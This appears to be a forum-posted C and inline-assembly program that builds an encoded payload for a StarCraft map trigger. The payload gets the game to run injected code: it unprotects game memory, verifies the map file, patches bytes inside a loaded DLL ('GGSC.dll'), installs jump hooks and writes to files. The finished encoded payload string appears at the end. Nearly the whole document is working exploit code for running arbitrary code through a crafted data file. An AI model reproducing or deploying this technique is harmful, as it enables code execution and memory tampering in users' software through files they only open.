|
- #include <stdio.h>
- #include <windows.h>
- #pragma comment(lib,"ole32.lib")
- #pragma comment(lib,"dxguid.lib")
- #include "dmusici.h"
- #include "windows.h"
- #define DMUS_SEG_REPEAT_INFINITE 0xFFFFFFFF
- #define PINT int *
- #define FASTCALL __fastcall
- #pragma pack(1)
- typedef struct
- {
- DWORD Unused0;
- DWORD Text;//1
- DWORD Code;//2
- DWORD Unused2;//
- DWORD Address;
- DWORD Value;
- USHORT Operator;
- } *ActionParams;
- typedef void *HANDLE;
- BOOL FASTCALL Comment(ActionParams params)
- {//V4
- HMODULE t;
- HANDLE mpq,file,file2;
- char *buffer;
- DWORD siz,siz2;
- char *path;
- BOOL (WINAPI*sc_VirtualProtect)(DWORD, DWORD, DWORD, DWORD *);
- BOOL (WINAPI*sc_ReadProcessMemory)( HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, DWORD nSize, LPDWORD lpNumberOfBytesRead );
- BOOL (WINAPI*sc_WriteProcessMemory)( HANDLE hProcess, LPVOID lpBaseAddress, LPVOID lpBuffer, DWORD nSize, LPDWORD lpNumberOfBytesWritten );
- DWORD oldProtect;
- _asm{
- call $+5+15;//13是下面的_EMIT 指令的数量,也就是包括\0在内的字符串长度
- _EMIT 'V';//这里写入API函数的名字。
- _EMIT 'i'
- _EMIT 'r'
- _EMIT 't'
- _EMIT 'u'
- _EMIT 'a'
- _EMIT 'l'
- _EMIT 'P'
- _EMIT 'r'
- _EMIT 'o'
- _EMIT 't'
- _EMIT 'e'
- _EMIT 'c'
- _EMIT 't'
- _EMIT '\0';//空结束符是必不可少的。
- mov eax,fs:30h;
- mov eax,[eax+0Ch];
- mov esi,[eax+1Ch];
- lodsd;
- push [eax+8];
- call DS:[0x4ED160];//sc_GetProcAddress ,不能写字符常量,否则会编译出错。
- mov sc_VirtualProtect,eax;
- call $+5+19;//13是下面的_EMIT 指令的数量,也就是包括\0在内的字符串长度
- _EMIT 'W';//这里写入API函数的名字。
- _EMIT 'r'
- _EMIT 'i'
- _EMIT 't'
- _EMIT 'e'
- _EMIT 'P'
- _EMIT 'r'
- _EMIT 'o'
- _EMIT 'c'
- _EMIT 'e'
- _EMIT 's'
- _EMIT 's'
- _EMIT 'M'
- _EMIT 'e'
- _EMIT 'm'
- _EMIT 'o'
- _EMIT 'r'
- _EMIT 'y'
- _EMIT '\0';//空结束符是必不可少的。
- mov eax,fs:30h;
- mov eax,[eax+0Ch];
- mov esi,[eax+1Ch];
- lodsd;
- push [eax+8];
- call DS:[0x4ED160];//sc_GetProcAddress ,不能写字符常量,否则会编译出错。
- mov sc_WriteProcessMemory,eax;
- call $+5+18;//13是下面的_EMIT 指令的数量,也就是包括\0在内的字符串长度
- _EMIT 'R';//这里写入API函数的名字。
- _EMIT 'e'
- _EMIT 'a'
- _EMIT 'd'
- _EMIT 'P'
- _EMIT 'r'
- _EMIT 'o'
- _EMIT 'c'
- _EMIT 'e'
- _EMIT 's'
- _EMIT 's'
- _EMIT 'M'
- _EMIT 'e'
- _EMIT 'm'
- _EMIT 'o'
- _EMIT 'r'
- _EMIT 'y'
- _EMIT '\0';//空结束符是必不可少的。
- mov eax,fs:30h;
- mov eax,[eax+0Ch];
- mov esi,[eax+1Ch];
- lodsd;
- push [eax+8];
- call DS:[0x4ED160];//sc_GetProcAddress ,不能写字符常量,否则会编译出错。
- mov sc_ReadProcessMemory,eax;
- //解除保护start
- lea eax,oldProtect
- push eax
- push 40h
- push 0EC000h
- push 401000h
- call sc_VirtualProtect
-
- //校验scenario.chk
- lea eax,mpq
- push eax
- push 0
- push 0
- push 0509364h
- _EMIT 0xFF
- _EMIT 0x15
- _EMIT 0xBC
- _EMIT 0xD2
- _EMIT 0x4E
- _EMIT 0x00//OpenArchive
- lea eax,[file]
- push eax
- push 0
- push 4EE0B0h//staredit\\scenario.chk
- push mpq
- _EMIT 0xFF
- _EMIT 0x15
- _EMIT 0x68
- _EMIT 0xD3
- _EMIT 0x4E
- _EMIT 0x00//OpenFile1Ex
- push 0
- push file
- _EMIT 0xFF
- _EMIT 0x15
- _EMIT 0x58
- _EMIT 0xD3
- _EMIT 0x4E
- _EMIT 0x00//GetFilesize
- mov siz,eax
- add eax,4
- push 40h
- push 1000h
- push eax//500K
- push 0
- _EMIT 0xFF
- _EMIT 0x15
- _EMIT 0x2C
- _EMIT 0xD1
- _EMIT 0x4E
- _EMIT 0x00//VirtuaAlloc
- mov buffer,eax
- push 0
- lea ecx,siz
- push ecx
- push siz
- push eax
- push file
- _EMIT 0xFF
- _EMIT 0x15
- _EMIT 0x54
- _EMIT 0xD3
- _EMIT 0x4E
- _EMIT 0x00//ReadFile
- }
- DWORD check = 0;
- for(unsigned int i = 0; i < siz; i += 7)
- check += (i % 64) * buffer;
- path = buffer + siz;
- _asm
- {
- lea ecx,file2
- push ecx
- push 0
- push 04FBD08h
- push mpq
- _EMIT 0xFF
- _EMIT 0x15
- _EMIT 0x68
- _EMIT 0xD3
- _EMIT 0x4E
- _EMIT 0x00//Openfile2Ex
- push 0
- push file2
- _EMIT 0xFF
- _EMIT 0x15
- _EMIT 0x58
- _EMIT 0xD3
- _EMIT 0x4E
- _EMIT 0x00 //GetFile2size
- cmp eax,0
- sub eax,4
- mov siz2,eax
- je crash
- lea ecx,oldProtect
- push 0
- push ecx
- push 4
- push path
- push file2
- _EMIT 0xFF
- _EMIT 0x15
- _EMIT 0x54
- _EMIT 0xD3
- _EMIT 0x4E
- _EMIT 0x00 //ReadFile2
- lea ecx,oldProtect
- mov eax, 0064650Ch
- mov eax, dword ptr [eax]
- inc eax
- push 0
- push ecx
- push siz2
- push eax
- push file2
- _EMIT 0xFF
- _EMIT 0x15
- _EMIT 0x54
- _EMIT 0xD3
- _EMIT 0x4E
- _EMIT 0x00 //ReadFile2ex
- mov eax,dword ptr [path]
- mov eax,dword ptr [eax]
- cmp eax,check
- je OK
- }
- crash: return false;
- OK:
- _asm{
- push file
- _EMIT 0xFF
- _EMIT 0x15
- _EMIT 0x60
- _EMIT 0xD3
- _EMIT 0x4E
- _EMIT 0x00 //Close File
- push file2
- _EMIT 0xFF
- _EMIT 0x15
- _EMIT 0x60
- _EMIT 0xD3
- _EMIT 0x4E
- _EMIT 0x00 //Close File
- push mpq
- _EMIT 0xFF
- _EMIT 0x15
- _EMIT 0xC0
- _EMIT 0xD2
- _EMIT 0x4E
- _EMIT 0x00 //Close Archive
- push 8000h//MEM_RELEASE
- push 0
- push buffer
- call DS:[4ED114h];//VirtualFree
- //Ban GGSC
- call $+14
- _EMIT 'G'
- _EMIT 'G'
- _EMIT 'S'
- _EMIT 'C'
- _EMIT '.'
- _EMIT 'd'
- _EMIT 'l'
- _EMIT 'l'
- _EMIT '\0'
- _EMIT 0xFF
- _EMIT 0x15
- _EMIT 0x5C
- _EMIT 0xD1
- _EMIT 0x4E
- _EMIT 0x00
- cmp eax,0
- je backup
- mov t,eax
- }
- int aa=(int)t+0x0d95a;
- int OB1=0xea839090;
- unsigned int OBJ;
- (*sc_ReadProcessMemory)((HANDLE)-1,(LPCVOID)aa,&OBJ,4,0);
- if(OBJ!=OB1)(*sc_WriteProcessMemory)((HANDLE)-1,(LPVOID)aa,&OB1,4,0);
- //Backup
- _asm
- {
- backup:
- push 40h
- push 1000h
- push 20000h//500K
- push 0
- _EMIT 0xFF
- _EMIT 0x15
- _EMIT 0x2C
- _EMIT 0xD1
- _EMIT 0x4E
- _EMIT 0x00//VirtuaAlloc
- mov EBX,eax//ebx=quitasm
- MOV EDI,EBX
- MOV ECX,1013Ch
- MOV ESI,4F25C0h
- REP MOVSB
- MOV ECX,0F9Ch
- MOV ESI,537510h
- REP MOVSB
- MOV ECX,9E24h
- MOV ESI,587660h
- MOV ESI,[ESI]
- REP MOVSB
- pushad
- call $+5
- pop eax
- add eax,21h;
- mov edx,044811ch
- sub eax,edx
- sub eax,5
- mov byte ptr ds: [edx],0e9h
- xchg [edx+1],eax;
- mov EAX,52DF00h
- mov esi,EBX
- mov dword ptr [eax],esi
- popad
- jmp e1;
- //QuitAsm
- PUSHAD
- MOV ECX,1013Ch
- MOV ESI,DWORD PTR DS:[52DF00h];
- MOV EDI,4F25C0h
- REP MOVSB
- MOV ECX,0F9Ch
- MOV EDI,537510h
- REP MOVSB
- MOV ECX,9E24h
- MOV EDI,587660h
- MOV EDI,DWORD PTR DS:[EDI]
- REP MOVSB
- MOV DWORD PTR DS:[44811Ch],8966c085h
- MOV DWORD PTR DS:[448120h],645fb80dh
- POPAD
- TEST EAX,EAX
- MOV WORD PTR DS:[645FB8h],CX
- MOV EAX,448125h
- JMP EAX
- //save rep
- //jmp
- e1: pushad
- mov eax,464FC5h
- mov byte ptr[eax],0E9h
- inc eax
- mov dword ptr[eax],000c908bh
- call $+5
- pop esi
- add esi,16h//var
- mov edi,52e055h
- mov ecx,300h//var
- rep movsb//dump
- popad
- jmp rep2
- //save asm
- rep1: pushad
- mov ecx,200h
- mov esi,012F178h
- mov edi,52e400h
- rep movsb
- mov ecx,200h
- mov esi,0509364h
- rep movsb
- mov ebp,52E034h
- call $+5+11;
- _EMIT 'm'
- _EMIT 's'
- _EMIT 'v'
- _EMIT 'c'
- _EMIT 'r'
- _EMIT 't'
- _EMIT '.'
- _EMIT 'd'
- _EMIT 'l'
- _EMIT 'l'
- _EMIT '\0'
- call DS:[004ED1B0h];//GetModuleHandle
- mov ebx,eax;
- call $+5+6;
- _EMIT 'f'
- _EMIT 'o'
- _EMIT 'p'
- _EMIT 'e'
- _EMIT 'n'
- _EMIT '\0'
- push ebx
- call DS:[0x4ED160]
- mov [ebp], eax
-
- call $+5+6;
- _EMIT 'f'
- _EMIT 't'
- _EMIT 'e'
- _EMIT 'l'
- _EMIT 'l'
- _EMIT '\0'
- push ebx
- call DS:[0x4ED160]
- mov [ebp+04h], eax
-
- call $+5+6;
- _EMIT 'f'
- _EMIT 'r'
- _EMIT 'e'
- _EMIT 'a'
- _EMIT 'd'
- _EMIT '\0'
- push ebx
- call DS:[0x4ED160]
- mov [ebp+08h], eax
-
- call $+5+7;
- _EMIT 'f'
- _EMIT 'w'
- _EMIT 'r'
- _EMIT 'i'
- _EMIT 't'
- _EMIT 'e'
- _EMIT '\0'
- push ebx
- call DS:[0x4ED160]
- mov [ebp+0Ch], eax
-
- call $+5+6;
- _EMIT 'f'
- _EMIT 's'
- _EMIT 'e'
- _EMIT 'e'
- _EMIT 'k'
- _EMIT '\0'
- push ebx
- call DS:[0x4ED160]
- mov [ebp+010h], eax
- call $+5+7;
- _EMIT 'f'
- _EMIT 'c'
- _EMIT 'l'
- _EMIT 'o'
- _EMIT 's'
- _EMIT 'e'
- _EMIT '\0'
- push ebx
- call DS:[0x4ED160]
- mov [ebp+014h], eax
-
- call $+5+7;
- _EMIT 'm'
- _EMIT 'a'
- _EMIT 'l'
- _EMIT 'l'
- _EMIT 'o'
- _EMIT 'c'
- _EMIT '\0'
- push ebx
- call DS:[0x4ED160]
- mov [ebp+018h], eax
-
- call $+5+5;
- _EMIT 'f'
- _EMIT 'r'
- _EMIT 'e'
- _EMIT 'e'
- _EMIT '\0'
- push ebx
- call DS:[0x4ED160]
- mov [ebp+01Ch], eax
- call $+5+3
- _EMIT 'r'
- _EMIT 'b'
- _EMIT '\0'
- push 52e400h
- call [ebp] // fopen1
- add esp,8
- mov dword ptr DS:[052e018h],eax //f1
- push 2
- push 0
- push eax
- call [ebp+010h] //fseek1
- add esp,12
- push dword ptr DS:[052e018h]
- call [ebp+04h] //ftell1
- pop ebx
- mov ecx,0200h//calc
- xor edx,edx
- _EMIT 0xF7
- _EMIT 0xF9//idiv eax,ecx
- sub ecx,edx//ecx = pad 00 count
- mov dword ptr DS:[052e020h],ecx//f1pad
-
- push dword ptr DS:[052e018h]
- call [ebp+014h] //fclose
- pop ebx
- call $+5+3
- _EMIT 'r'
- _EMIT 'b'
- _EMIT '\0'
- push 052e600h
- call [ebp] // fopen2
- add esp,8
- mov dword ptr DS:[052e018h],eax //f2
- push 2
- push 0
- push eax//FILE*
- call [ebp+010h] //fseek map to end
- add esp,12
- push dword ptr DS:[052e018h]
- call [ebp+04h] //ftell map f2
- pop ebx
- mov dword ptr DS:[052e01Ch],eax//f4是f2size
- add eax,dword ptr DS:[052e020h]
- push eax
- call [ebp+018h] //malloc
- pop ebx
- mov edi,eax//!!!edi是buffer
- mov dword ptr DS:[052e024h],edi
- push 0
- push 0
- push dword ptr DS:[052e018h]
- call [ebp+010h] //fseek map to top1
- add esp,12
- mov ecx,dword ptr DS:[052e020h]//pad size
- add edi,ecx
- push dword ptr DS:[052e018h]//FILE*
- push 1
- push dword ptr DS:[052e01Ch]//size
- push edi//buffer
- call [ebp+08h] //fread1
- add esp,16
- push dword ptr DS:[052e018h]
- call [ebp+014h] //fclose1
- pop ebx
- call $+5+3
- _EMIT 'a'
- _EMIT 'b'
- _EMIT '\0'
- push 52e400h
- call [ebp] // fopen1
- add esp,8
- mov dword ptr DS:[052e018h],eax
- mov ebx,dword ptr DS:[052e01Ch]//f2size
- add ebx,dword ptr DS:[052e020h] //+f1size
- push eax//FILE*
- push 1
- push ebx
- push dword ptr DS:[052e024h]
- call [ebp+0Ch] //fwrite3
- add esp,16
- push dword ptr DS:[052e018h]
- call [ebp+014h] //fclose1
- pop ebx
- push dword ptr DS:[052e024h]
- call [ebp+01Ch] //free1
- pop ebx
-
- mov eax,0464FC5h
- mov byte ptr[eax],085h
- inc eax
- mov dword ptr[eax],0B91A74C0h
- popad
- mov ecx,00464FC5h
- jmp ecx
- }
- rep2: return true;
- }
- void AfterFunction(){}
- LPCSTR Base64Enc(int size = 0)
- {
- if (size <= 0)
- size = PtrToLong((PBYTE)AfterFunction - (PBYTE)Comment);
- PBYTE text = (PBYTE)Comment;
- PBYTE out = new BYTE[(size - 1) * 4 / 3 + 1],buf = out;
- int buflen = 0;
- while(size>0)
- {
- *buf++ = ((text[0] >> 2 ) & 0x3f) + 0x30;
- *buf++ = (((text[0] & 3) << 4) | (text[1] >> 4)) + 0x30;
- *buf++ = (((text[1] & 0xF) << 2) | (text[2] >> 6)) + 0x30;
- *buf++ = (text[2] & 0x3F) + 0x30;
- text +=3;
- size -=3;
- buflen +=4;
- }
- *buf = 0;
- return (LPCSTR)out;
- }
- int main(int argc, CHAR* argv[])
- {
-
- FILE *f1=fopen("d:\\desktop\\comment20.txt","wb");
- fprintf(f1,"Comment(\"%s\", 0, 0, 20, 0, 1);\nComment(\"\", 0, 0, 0, 0, 20);",Base64Enc());
- fclose(f1);
- int i;
- }
- Comment("EH_\Pna8DeIGRDfhj0l0001FJG9dMF5\D79_M6ESM01TXC00002;@0b;L1b]og08?_lEH=5>08U5l>PC0000Eg9YM6E@LVmSIG=cCFE]Kg9i06BQ<00008]038]`7:goL0PnoaEPdDh0RDG\j180001BIF5TD79_HfEcLdeUKFmbN@1TXC00002;@0b;L1b]og08?_lEH=5>08U5i8e5m51Z@6P0`0h0J00@@03oEO2=AMA@JP1Z06QTTe00oaFldTh0SDGXD6X0J;3PCP3oMMCo5FSCCP1Z0?mej?lEF==>08U5`8?016Y0J00@001@JP3o5BcACP29ALQZ08e=`57oML1@ogGXoaEDddh0PfGh08=U_03[2H]5_8?01hU5_8]5_3]5`7<NRdFl<m9Z@5WglH]5b0=5_0nn00n_d0=En8UEn>_ARdG80dG0RDG<SDgHDFX0J0RmC`3oMMCo5FSCCP1Z0?mef?lEF==>08?h08?X18U5g7@iSDgdJP1AJPCoMLcoMMSo5ECCCP2=COBh36ET08\0@6X0DOmeg53oMMSo5ECCCP2;ALb;03]5n7@7<l3YT@<00?mej?lEH==>0?mef?lEH==>0?mee?lE`=9>06P0P000JP3oMLPnoaDDdDh0j0T00017Ae=3;VA\K03o5EcACP23n01d?HU5a8]5a0EJf@00RDGladG@T923jVX0JPB=AN1@ogGlJ_ooENB;AN0kAM1d46X0JPB=AM1@ogGlJ_ooENaZ@6P04000J0000P1Z0?lE;=5>08_HRo^i?0410;k09Dl0ljBiW0l00;h@ME<0ljBi99h00;iPMUP0RcKcY63X000005R3`26j785402_2PnP5?\H2jHM20KP0ge80Ro>9<67[Ef2i?04103j;=@3ODP2o`2E?0?>T^I`?002o47EC0?>T^BBN002oH7IH03j;?o>T?\L5785408G0IXTna`DPPD@03KQOI665`6HnR@fhGf@0^2F1A03oh62haDm60<H0jD3708^@303X000005j3aQJoEN1B0;T00`00ljAQjBD2001P^@02002nN?4B0;l0i580ljBi00800;iTTe00ljBm=>1B0>P;0000KG=fHg9d;VA\K00noaF`dDh0RmSX1P0006I_L6E^05<noaEPdDh0RDD0j0H0001VM6E\K01C?_lEH=5>08U51>P60000IW9UHF@0Dcko5F3ACP29A@SX1`0006IgLVUdI@1C?_lEH=5>08U53>P60000IW=UIF\0Dcko5F3ACP29AA3X1`0006ISK6mcI@1C?_lEH=5>08U55>P70000KF5\K6mS05<noaEPdDh0RDDHj0D0001VLVEU05<noaEPdDh0RDDLj0<0001bHP1X0>AB0?mE08?423jS6>1B06X2JP1@oeD@Pl@<?_le6>1B0?mE15^i008003?BmoT[bSj93B3PDP0nocDHh580oeDDFnP30000LV80J03VDP3oE@23a0PnXaSPDP1Z0VX0D?mE48?433ko=ASPDP3oE@AK?Z<Lh580?P<58>1B053oEAQKRoPnRCdTh580JP1Z03ko=ASPDP3oEA23a0`nR`dPh5800oTnocDHh580JP4nocDLh580EomE28?443ko=ASPDP3oEAAKj0<0001QHP1X0>AB0?mE08?423jS6>1B03j;7AcPDP0n0adPh580D6X1Dcko=BCPDP3oE@b3a10nocDHh580oeDDFcko=BCPDP3oEAaK^<E?AP3608E0a`30M1ZiHKW5CdH0on4c`41OGU_9`l=A", 0, 0, 20, 0, 1);
- Comment("", 0, 0, 0, 0, 20);
复制代码 |
|